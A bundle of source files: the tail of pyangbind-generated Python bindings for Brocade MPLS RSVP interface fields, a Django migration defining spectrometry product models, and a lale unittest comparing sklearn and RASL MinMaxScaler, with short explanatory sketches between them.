do so by calling thisObj._set_mpls_rsvp_interface_tunnel_name() directly.
YANG Description: Bypass LSP name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-tunnel-name", rest_name="mpls-rsvp-interface-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_tunnel_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-tunnel-name", rest_name="mpls-rsvp-interface-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_tunnel_name = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_tunnel_name(self):
self.__mpls_rsvp_interface_tunnel_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-tunnel-name", rest_name="mpls-rsvp-interface-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_rsvp_interface_bypass_tunnel_interface_name(self):
"""
Getter method for mpls_rsvp_interface_bypass_tunnel_interface_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_tunnel_interface_name (string)
YANG Description: Bypass LSP interface name
"""
return self.__mpls_rsvp_interface_bypass_tunnel_interface_name
def _set_mpls_rsvp_interface_bypass_tunnel_interface_name(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_bypass_tunnel_interface_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_tunnel_interface_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_bypass_tunnel_interface_name is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_bypass_tunnel_interface_name() directly.
YANG Description: Bypass LSP interface name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-tunnel-interface-name", rest_name="mpls-rsvp-interface-bypass-tunnel-interface-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_bypass_tunnel_interface_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-tunnel-interface-name", rest_name="mpls-rsvp-interface-bypass-tunnel-interface-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_bypass_tunnel_interface_name = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_bypass_tunnel_interface_name(self):
self.__mpls_rsvp_interface_bypass_tunnel_interface_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-tunnel-interface-name", rest_name="mpls-rsvp-interface-bypass-tunnel-interface-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_rsvp_interface_bypass_creation_time(self):
"""
Getter method for mpls_rsvp_interface_bypass_creation_time, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_creation_time (string)
YANG Description: Bypass LSP creation time
"""
return self.__mpls_rsvp_interface_bypass_creation_time
def _set_mpls_rsvp_interface_bypass_creation_time(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_bypass_creation_time, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_creation_time (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_bypass_creation_time is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_bypass_creation_time() directly.
YANG Description: Bypass LSP creation time
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-time", rest_name="mpls-rsvp-interface-bypass-creation-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_bypass_creation_time must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-time", rest_name="mpls-rsvp-interface-bypass-creation-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_bypass_creation_time = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_bypass_creation_time(self):
self.__mpls_rsvp_interface_bypass_creation_time = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-time", rest_name="mpls-rsvp-interface-bypass-creation-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_rsvp_interface_bypass_creation_location(self):
"""
Getter method for mpls_rsvp_interface_bypass_creation_location, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_creation_location (uint32)
YANG Description: Bypass LSP creation location
"""
return self.__mpls_rsvp_interface_bypass_creation_location
def _set_mpls_rsvp_interface_bypass_creation_location(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_bypass_creation_location, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_creation_location (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_bypass_creation_location is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_bypass_creation_location() directly.
YANG Description: Bypass LSP creation location
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-location", rest_name="mpls-rsvp-interface-bypass-creation-location", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_bypass_creation_location must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-location", rest_name="mpls-rsvp-interface-bypass-creation-location", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_bypass_creation_location = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_bypass_creation_location(self):
self.__mpls_rsvp_interface_bypass_creation_location = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-location", rest_name="mpls-rsvp-interface-bypass-creation-location", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_assoc_bypass_LSPs(self):
"""
Getter method for mpls_rsvp_interface_assoc_bypass_LSPs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_assoc_bypass_LSPs (string)
YANG Description: A few associated bypass LSP names
"""
return self.__mpls_rsvp_interface_assoc_bypass_LSPs
def _set_mpls_rsvp_interface_assoc_bypass_LSPs(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_assoc_bypass_LSPs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_assoc_bypass_LSPs (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_assoc_bypass_LSPs is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_assoc_bypass_LSPs() directly.
YANG Description: A few associated bypass LSP names
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-assoc-bypass-LSPs", rest_name="mpls-rsvp-interface-assoc-bypass-LSPs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_assoc_bypass_LSPs must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-assoc-bypass-LSPs", rest_name="mpls-rsvp-interface-assoc-bypass-LSPs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_assoc_bypass_LSPs = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_assoc_bypass_LSPs(self):
self.__mpls_rsvp_interface_assoc_bypass_LSPs = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-assoc-bypass-LSPs", rest_name="mpls-rsvp-interface-assoc-bypass-LSPs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
mpls_rsvp_interface_hello_interval = __builtin__.property(_get_mpls_rsvp_interface_hello_interval, _set_mpls_rsvp_interface_hello_interval)
mpls_rsvp_interface_hello_tolerance = __builtin__.property(_get_mpls_rsvp_interface_hello_tolerance, _set_mpls_rsvp_interface_hello_tolerance)
mpls_rsvp_interface_hello_status = __builtin__.property(_get_mpls_rsvp_interface_hello_status, _set_mpls_rsvp_interface_hello_status)
mpls_rsvp_interface_te_up_thresholds = __builtin__.property(_get_mpls_rsvp_interface_te_up_thresholds, _set_mpls_rsvp_interface_te_up_thresholds)
mpls_rsvp_interface_te_down_thresholds = __builtin__.property(_get_mpls_rsvp_interface_te_down_thresholds, _set_mpls_rsvp_interface_te_down_thresholds)
g_mpls_prot_statistics_pkt_types = __builtin__.property(_get_g_mpls_prot_statistics_pkt_types, _set_g_mpls_prot_statistics_pkt_types)
g_mpls_prot_statistics_errors = __builtin__.property(_get_g_mpls_prot_statistics_errors, _set_g_mpls_prot_statistics_errors)
mpls_rsvp_interface_active_backup_outsegs = __builtin__.property(_get_mpls_rsvp_interface_active_backup_outsegs, _set_mpls_rsvp_interface_active_backup_outsegs)
mpls_rsvp_interface_inactive_backup_outsegs = __builtin__.property(_get_mpls_rsvp_interface_inactive_backup_outsegs, _set_mpls_rsvp_interface_inactive_backup_outsegs)
mpls_rsvp_interface_duplicate_preempts_dropped = __builtin__.property(_get_mpls_rsvp_interface_duplicate_preempts_dropped, _set_mpls_rsvp_interface_duplicate_preempts_dropped)
mpls_rsvp_interface_p2mp_capability = __builtin__.property(_get_mpls_rsvp_interface_p2mp_capability, _set_mpls_rsvp_interface_p2mp_capability)
mpls_rsvp_interface_bypass_interface = __builtin__.property(_get_mpls_rsvp_interface_bypass_interface, _set_mpls_rsvp_interface_bypass_interface)
mpls_rsvp_interface_tunnel_name = __builtin__.property(_get_mpls_rsvp_interface_tunnel_name, _set_mpls_rsvp_interface_tunnel_name)
mpls_rsvp_interface_bypass_tunnel_interface_name = __builtin__.property(_get_mpls_rsvp_interface_bypass_tunnel_interface_name, _set_mpls_rsvp_interface_bypass_tunnel_interface_name)
mpls_rsvp_interface_bypass_creation_time = __builtin__.property(_get_mpls_rsvp_interface_bypass_creation_time, _set_mpls_rsvp_interface_bypass_creation_time)
mpls_rsvp_interface_bypass_creation_location = __builtin__.property(_get_mpls_rsvp_interface_bypass_creation_location, _set_mpls_rsvp_interface_bypass_creation_location)
mpls_rsvp_interface_assoc_bypass_LSPs = __builtin__.property(_get_mpls_rsvp_interface_assoc_bypass_LSPs, _set_mpls_rsvp_interface_assoc_bypass_LSPs)
_pyangbind_elements = {'mpls_rsvp_interface_hello_interval': mpls_rsvp_interface_hello_interval, 'mpls_rsvp_interface_hello_tolerance': mpls_rsvp_interface_hello_tolerance, 'mpls_rsvp_interface_hello_status': mpls_rsvp_interface_hello_status, 'mpls_rsvp_interface_te_up_thresholds': mpls_rsvp_interface_te_up_thresholds, 'mpls_rsvp_interface_te_down_thresholds': mpls_rsvp_interface_te_down_thresholds, 'g_mpls_prot_statistics_pkt_types': g_mpls_prot_statistics_pkt_types, 'g_mpls_prot_statistics_errors': g_mpls_prot_statistics_errors, 'mpls_rsvp_interface_active_backup_outsegs': mpls_rsvp_interface_active_backup_outsegs, 'mpls_rsvp_interface_inactive_backup_outsegs': mpls_rsvp_interface_inactive_backup_outsegs, 'mpls_rsvp_interface_duplicate_preempts_dropped': mpls_rsvp_interface_duplicate_preempts_dropped, 'mpls_rsvp_interface_p2mp_capability': mpls_rsvp_interface_p2mp_capability, 'mpls_rsvp_interface_bypass_interface': mpls_rsvp_interface_bypass_interface, 'mpls_rsvp_interface_tunnel_name': mpls_rsvp_interface_tunnel_name, 'mpls_rsvp_interface_bypass_tunnel_interface_name': mpls_rsvp_interface_bypass_tunnel_interface_name, 'mpls_rsvp_interface_bypass_creation_time': mpls_rsvp_interface_bypass_creation_time, 'mpls_rsvp_interface_bypass_creation_location': mpls_rsvp_interface_bypass_creation_location, 'mpls_rsvp_interface_assoc_bypass_LSPs': mpls_rsvp_interface_assoc_bypass_LSPs, }
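The generated setter above follows pyangbind's usual validate-then-assign pattern: coerce the incoming value, try to construct the typed leaf, and raise a descriptive `ValueError` carrying the error string and defined type on failure. A minimal stdlib-only sketch of that pattern; `StringLeaf` and `Container` are hypothetical stand-ins for `YANGDynClass(base=unicode, ...)` and the generated container class, not pyangbind code:

```python
class StringLeaf:
    """Hypothetical stand-in for YANGDynClass: only checks the base type."""
    def __init__(self, value):
        if not isinstance(value, str):
            raise TypeError("value must be a string")
        self.value = value

class Container:
    def _set_leaf(self, v):
        # Validate by attempting construction, as the generated setter does.
        try:
            t = StringLeaf(v)
        except (TypeError, ValueError):
            raise ValueError({
                "error-string": "leaf must be of a type compatible with string",
                "defined-type": "string",
            })
        self._leaf = t

    def _unset_leaf(self):
        # Reset to the default-constructed leaf, mirroring _unset_* above.
        self._leaf = StringLeaf("")

c = Container()
c._set_leaf("bypass_lsp_1")  # accepted: value is a string
```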
# File: scieio/spectrometry/migrations/0002_gas_gasms_liquid_liquidms.py
# Repo: arnelimperial/scieio (MIT license)
# Generated by Django 3.0.5 on 2020-04-18 20:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('conditions', '0001_initial'),
('manufacturers', '0001_initial'),
('sellers', '0004_auto_20200418_0002'),
('spectrometry', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Gas',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(editable=False, max_length=255, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('spectrometry_category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gases', related_query_name='gas', to='spectrometry.SpectrometryCategory')),
],
options={
'ordering': ['id'],
'unique_together': {('name', 'slug')},
},
),
migrations.CreateModel(
name='Liquid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(editable=False, max_length=255, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('spectrometry_category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='liquids', related_query_name='liquid', to='spectrometry.SpectrometryCategory')),
],
options={
'ordering': ['id'],
'unique_together': {('name', 'slug')},
},
),
migrations.CreateModel(
name='LiquidMS',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(editable=False, max_length=255, unique=True)),
('description', models.TextField()),
('product_code', models.CharField(editable=False, max_length=11, unique=True)),
('model', models.CharField(max_length=255, unique=True)),
('warranty', models.BooleanField(default=True)),
('image', models.URLField()),
('availability', models.BooleanField(default=True)),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('condition', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='conditions.Condition')),
('liquid_spectrometer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='liquid_spectrometers', related_query_name='liquid_spectrometer', to='spectrometry.Liquid')),
('manufacturer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='manufacturers.Manufacturer')),
('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sellers.Seller')),
],
options={
'ordering': ['id'],
'unique_together': {('name', 'slug')},
},
),
migrations.CreateModel(
name='GasMS',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(editable=False, max_length=255, unique=True)),
('description', models.TextField()),
('product_code', models.CharField(editable=False, max_length=11, unique=True)),
('model', models.CharField(max_length=255, unique=True)),
('warranty', models.BooleanField(default=True)),
('image', models.URLField()),
('availability', models.BooleanField(default=True)),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('condition', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='conditions.Condition')),
('gas_spectrometer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gas_spectrometers', related_query_name='gas_spectrometer', to='spectrometry.Gas')),
('manufacturer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='manufacturers.Manufacturer')),
('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sellers.Seller')),
],
options={
'ordering': ['id'],
'unique_together': {('name', 'slug')},
},
),
]
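Each model above declares `slug = models.SlugField(editable=False, ..., unique=True)`, which suggests the slug is derived from `name` in model code not shown in this migration. For reference, a rough stdlib approximation of `django.utils.text.slugify` (the instrument name in the example is made up):

```python
import re
import unicodedata

def slugify(value: str) -> str:
    """Rough stdlib approximation of django.utils.text.slugify."""
    # Drop non-ASCII characters after compatibility decomposition.
    value = unicodedata.normalize("NFKD", value).encode("ascii", "ignore").decode("ascii")
    # Keep word characters, whitespace, and hyphens; lowercase the rest.
    value = re.sub(r"[^\w\s-]", "", value).strip().lower()
    # Collapse runs of whitespace/hyphens into single hyphens.
    return re.sub(r"[-\s]+", "-", value)

slug = slugify("Agilent 7890B GC/MS")  # "agilent-7890b-gcms"
```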
# File: test/test_relational_sklearn.py
# Repo: DorotaDR/lale (Apache-2.0 license)
# Copyright 2021 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import unittest
import jsonschema
import numpy as np
import pandas as pd
from sklearn.impute import SimpleImputer as SkSimpleImputer
from sklearn.preprocessing import MinMaxScaler as SkMinMaxScaler
from sklearn.preprocessing import OneHotEncoder as SkOneHotEncoder
from sklearn.preprocessing import OrdinalEncoder as SkOrdinalEncoder
from sklearn.preprocessing import StandardScaler as SkStandardScaler
import lale.datasets
import lale.datasets.openml
from lale.datasets.multitable.fetch_datasets import fetch_go_sales_dataset
from lale.expressions import it
from lale.lib.lale import Scan, categorical
from lale.lib.rasl import Map
from lale.lib.rasl import MinMaxScaler as RaslMinMaxScaler
from lale.lib.rasl import OneHotEncoder as RaslOneHotEncoder
from lale.lib.rasl import OrdinalEncoder as RaslOrdinalEncoder
from lale.lib.rasl import SimpleImputer as RaslSimpleImputer
from lale.lib.rasl import StandardScaler as RaslStandardScaler
from lale.lib.sklearn import FunctionTransformer, LogisticRegression
class TestMinMaxScaler(unittest.TestCase):
def setUp(self):
self.go_sales = fetch_go_sales_dataset()
def _check_trained(self, sk_trained, rasl_trained):
self.assertEqual(list(sk_trained.data_min_), list(rasl_trained.impl.data_min_))
self.assertEqual(list(sk_trained.data_max_), list(rasl_trained.impl.data_max_))
self.assertEqual(
list(sk_trained.data_range_), list(rasl_trained.impl.data_range_)
)
self.assertEqual(list(sk_trained.scale_), list(rasl_trained.impl.scale_))
self.assertEqual(list(sk_trained.min_), list(rasl_trained.impl.min_))
self.assertEqual(sk_trained.n_features_in_, rasl_trained.impl.n_features_in_)
self.assertEqual(sk_trained.n_samples_seen_, rasl_trained.impl.n_samples_seen_)
def test_get_params(self):
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_params = sk_scaler.get_params()
rasl_params = rasl_scaler.get_params()
self.assertDictContainsSubset(sk_params, rasl_params)
def test_error(self):
with self.assertRaisesRegex(
jsonschema.ValidationError,
re.compile(r"MinMaxScaler\(copy=False\)", re.MULTILINE | re.DOTALL),
):
_ = RaslMinMaxScaler(copy=False)
with self.assertRaisesRegex(
jsonschema.ValidationError,
re.compile(r"MinMaxScaler\(clip=True\)", re.MULTILINE | re.DOTALL),
):
_ = RaslMinMaxScaler(clip=True)
def test_fit(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data)
self._check_trained(sk_trained, rasl_trained)
def test_transform(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data)
sk_transformed = sk_trained.transform(data)
rasl_transformed = rasl_trained.transform(data)
self.assertAlmostEqual(sk_transformed[0, 0], rasl_transformed.iloc[0, 0])
self.assertAlmostEqual(sk_transformed[0, 1], rasl_transformed.iloc[0, 1])
self.assertAlmostEqual(sk_transformed[0, 2], rasl_transformed.iloc[0, 2])
self.assertAlmostEqual(sk_transformed[10, 0], rasl_transformed.iloc[10, 0])
self.assertAlmostEqual(sk_transformed[10, 1], rasl_transformed.iloc[10, 1])
self.assertAlmostEqual(sk_transformed[10, 2], rasl_transformed.iloc[10, 2])
self.assertAlmostEqual(sk_transformed[20, 0], rasl_transformed.iloc[20, 0])
self.assertAlmostEqual(sk_transformed[20, 1], rasl_transformed.iloc[20, 1])
self.assertAlmostEqual(sk_transformed[20, 2], rasl_transformed.iloc[20, 2])
def test_fit_range(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
sk_scaler = SkMinMaxScaler(feature_range=(-5, 5))
rasl_scaler = RaslMinMaxScaler(feature_range=(-5, 5))
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data)
self._check_trained(sk_trained, rasl_trained)
def test_transform_range(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
sk_scaler = SkMinMaxScaler(feature_range=(-5, 5))
rasl_scaler = RaslMinMaxScaler(feature_range=(-5, 5))
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data)
sk_transformed = sk_trained.transform(data)
rasl_transformed = rasl_trained.transform(data)
self.assertAlmostEqual(sk_transformed[0, 0], rasl_transformed.iloc[0, 0])
self.assertAlmostEqual(sk_transformed[0, 1], rasl_transformed.iloc[0, 1])
self.assertAlmostEqual(sk_transformed[0, 2], rasl_transformed.iloc[0, 2])
self.assertAlmostEqual(sk_transformed[10, 0], rasl_transformed.iloc[10, 0])
self.assertAlmostEqual(sk_transformed[10, 1], rasl_transformed.iloc[10, 1])
self.assertAlmostEqual(sk_transformed[10, 2], rasl_transformed.iloc[10, 2])
self.assertAlmostEqual(sk_transformed[20, 0], rasl_transformed.iloc[20, 0])
self.assertAlmostEqual(sk_transformed[20, 1], rasl_transformed.iloc[20, 1])
self.assertAlmostEqual(sk_transformed[20, 2], rasl_transformed.iloc[20, 2])
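Both the sklearn and RASL transforms compared above implement the same formula: scale each value into [0, 1] using the fitted per-column minimum and maximum, then map into `feature_range`. A minimal scalar sketch of that formula (not the library code):

```python
def minmax_transform(x, data_min, data_max, feature_range=(0.0, 1.0)):
    """Apply sklearn's MinMaxScaler formula to a single value."""
    lo, hi = feature_range
    # X_std in [0, 1], then rescaled into [lo, hi].
    x_std = (x - data_min) / (data_max - data_min)
    return x_std * (hi - lo) + lo

mid = minmax_transform(5.0, 0.0, 10.0)                       # 0.5
mid_range = minmax_transform(5.0, 0.0, 10.0, (-5, 5))        # 0.0
```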
def test_partial_fit(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data1 = data[:10]
data2 = data[10:100]
data3 = data[100:]
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.partial_fit(data1)
rasl_trained = rasl_scaler.partial_fit(data1)
self._check_trained(sk_trained, rasl_trained)
sk_trained = sk_scaler.partial_fit(data2)
rasl_trained = rasl_scaler.partial_fit(data2)
self._check_trained(sk_trained, rasl_trained)
sk_trained = sk_scaler.partial_fit(data3)
rasl_trained = rasl_scaler.partial_fit(data3)
self._check_trained(sk_trained, rasl_trained)
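The `partial_fit` checks above work because per-column minima and maxima are mergeable across batches: folding in batches one at a time yields the same fitted statistics as fitting on all rows at once. A stdlib-only sketch of that merge (not the RASL implementation itself):

```python
def partial_fit_minmax(state, batch):
    """state is (mins, maxs, n_seen) or None; batch is a list of rows."""
    if not batch:
        return state
    cols = list(zip(*batch))
    b_min = [min(c) for c in cols]
    b_max = [max(c) for c in cols]
    if state is None:
        return b_min, b_max, len(batch)
    mins, maxs, n = state
    # Merge batch statistics into the running statistics column-wise.
    return ([min(a, b) for a, b in zip(mins, b_min)],
            [max(a, b) for a, b in zip(maxs, b_max)],
            n + len(batch))

data = [[1, 10], [5, 2], [3, 7], [9, 4]]
incremental = None
for lo, hi in [(0, 2), (2, 4)]:
    incremental = partial_fit_minmax(incremental, data[lo:hi])
full = partial_fit_minmax(None, data)
# incremental and full agree: ([1, 2], [9, 10], 4)
```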
class TestMinMaxScalerSpark(unittest.TestCase):
def setUp(self):
self.go_sales = fetch_go_sales_dataset()
def _check_trained(self, sk_trained, rasl_trained):
self.assertEqual(list(sk_trained.data_min_), list(rasl_trained.impl.data_min_))
self.assertEqual(list(sk_trained.data_max_), list(rasl_trained.impl.data_max_))
self.assertEqual(
list(sk_trained.data_range_), list(rasl_trained.impl.data_range_)
)
self.assertEqual(list(sk_trained.scale_), list(rasl_trained.impl.scale_))
self.assertEqual(list(sk_trained.min_), list(rasl_trained.impl.min_))
self.assertEqual(sk_trained.n_features_in_, rasl_trained.impl.n_features_in_)
self.assertEqual(sk_trained.n_samples_seen_, rasl_trained.impl.n_samples_seen_)
def test_fit(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data_spark = lale.datasets.pandas2spark(data)
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data_spark)
self._check_trained(sk_trained, rasl_trained)
def test_transform(self):
columns = ["Product number", "Quantity", "Retailer code"]
